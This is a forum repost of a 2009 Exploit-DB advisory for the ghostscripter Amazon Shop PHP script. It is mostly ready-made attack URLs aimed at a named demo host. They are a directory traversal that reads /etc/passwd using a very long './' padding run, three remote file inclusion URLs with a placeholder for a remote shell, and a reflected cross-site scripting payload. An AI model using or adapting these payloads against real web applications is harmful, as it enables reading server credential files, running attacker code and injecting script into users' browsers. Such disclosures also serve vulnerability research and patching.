Exploit tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8145
Проверка EDB
  1. Пройдено
Автор
D3B4G
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2009-03-03
Код:
[+] ghostscripter Amazon Shop (XSS/directory traversal[Unix]/File Include)Vulns
[-] Price: $549
[+] Discovered By d3b4g 
[+] script: http://ghostscripter.com/amazon_shop.php                  
[+] Greetz :  str0ke & My friends
[-] Follow me on twitter www.twitter.com/schaba

[+] 

 This script is suffer from Multiple Vulnerabilities
-----------------------------------------------------
0x1 Directory traversal[Unix]

preety longone _))

P0c: http://demo.ghostscripter.com/amazon/add_review.php?id=B00004TXJV&lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.



0x2 Multiple File Include:
--------------------------

p0c:

http://demo.ghostscripter.com:80/amazon/cart.php?cmd=add&asin=[shell]
http://demo.ghostscripter.com:80/amazon/index.php?lang=[shell]
http://demo.ghostscripter.com:80/amazon/info.php?asin=[shell]


0x3 Cross Site Scripting (XSS)
------------------------------

http://demo.ghostscripter.com/amazon/search.php?query=1<script>alert(xss)</script>&mode=all

# milw0rm.com [2009-03-03]
 
Источник
www.exploit-db.com

Похожие темы